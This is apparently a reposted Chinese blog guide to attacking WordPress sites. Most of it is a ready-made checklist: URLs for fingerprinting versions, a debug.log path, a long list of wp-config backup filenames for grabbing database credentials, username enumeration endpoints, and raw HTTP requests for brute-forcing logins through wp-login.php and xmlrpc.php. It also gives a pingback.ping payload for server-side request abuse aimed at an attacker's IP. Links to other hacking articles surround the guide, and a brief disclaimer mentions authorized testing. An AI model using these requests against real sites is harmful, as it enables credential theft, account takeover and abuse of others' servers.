2022年9月15日13:05:11评论100 views字数 2434阅读8分6秒阅读模式

扫码领资料

获黑客教程

免费&进群

如果遇到使用 WordPress 的网站，您会怎么做，渗透思路和安全检测思路？

如何挖掘Wordpress网站的漏洞

如果您访问https://target.com并查看源代码，您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php，它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

如何找到wordpress版本

https://target.com/feed https://target.com/?feed=rss2

如何找到插件版本

https://target.com/wp-content/plugins/PLUGINNAME/readme.txthttps://target.com/wp-content/plugins/PLUGINNAME/readme.TXThttps://target.com/wp-content/plugins/PLUGINNAME/README.txthttps://target.com/wp-content/plugins/PLUGINNAME/README.TXT

如何找到主题版本

https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题，请在https://wpscan.com找到漏洞利用

查找日志文件

http://target.com/wp-content/debug.log

查找备份文件 wp-config

http://target.com/.wp-config.php.swphttp://target.com/wp-config.inchttp://target.com/wp-config.oldhttp://target.com/wp-config.txthttp://target.com/wp-config.htmlhttp://target.com/wp-config.php.bakhttp://target.com/wp-config.php.disthttp://target.com/wp-config.php.inchttp://target.com/wp-config.php.oldhttp://target.com/wp-config.php.savehttp://target.com/wp-config.php.swphttp://target.com/wp-config.php.txthttp://target.com/wp-config.php.ziphttp://target.com/wp-config.php.htmlhttp://target.com/wp-config.php~

获取网站上的用户名

http://target.com/?author=1

或者

http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users

爆破后台账号密码

POST /wp-login.php HTTP/1.1Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

POST /xmlrpc.php HTTP/1.1Host: target.com
<?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>BRUTEFORCE_IN_HERE</value></param> </params> </methodCall>

wordpress 中的 XSPA

POST /xmlrpc.php HTTP/1.1Host: target.com
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourip:port</string></value></param><param><value><string>https://target.com></string></value></param></params></methodCall>

注册启用

http://example.com/wp-login.php?action=register

来源：HACK学习呀

声明：本公众号所分享内容仅用于网安爱好者之间的技术讨论，禁止用于违法途径，所有渗透都需获取授权！否则需自行承担，本公众号及原作者不承担相应的后果

@学习更多渗透技能！体验靶场实战练习

渗透干货 | Wordpress网站渗透方法指南

（hack视频资料及工具）

渗透干货 | Wordpress网站渗透方法指南

（部分展示）

往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理，拥有自己的代理池

漏洞挖掘｜密码找回中的套路

渗透测试岗位面试题(重点：渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货｜列了几种均能过安全狗的方法！

一名大学生的黑客成长史到入狱的自述

攻防演练｜红队手段之将蓝队逼到关站！

巧用FOFA挖到你的第一个漏洞

看到这里了，点个“赞”、“再看”

原文始发于微信公众号（白帽子左一）：渗透干货 | Wordpress网站渗透方法指南

左青龙
微信扫一扫

右白虎
微信扫一扫

渗透干货 | Wordpress网站渗透方法指南

如何挖掘Wordpress网站的漏洞

如何找到wordpress版本

如何找到插件版本

如何找到主题版本

查找日志文件

获取网站上的用户名

爆破后台账号密码

wordpress 中的 XSPA

注册启用

『红蓝对抗』无文件落地攻击手法

实战｜记一次shiro有key无常规链的打法

攻防|不太常见的Windows本地提权方法一览

漏洞探索/挖掘绕过双因素身份验证

实战环境中的Redis 延时注入

【2024挖矿应急实战】记录一次HW前夕的挖矿病毒应急实战

引入弹性架构，到底是为什么？

一个IP Getshell

渗透测试实战分享

如何将DOM XSS升级为一键帐户接管（上集）

发表评论

在线咨询

微信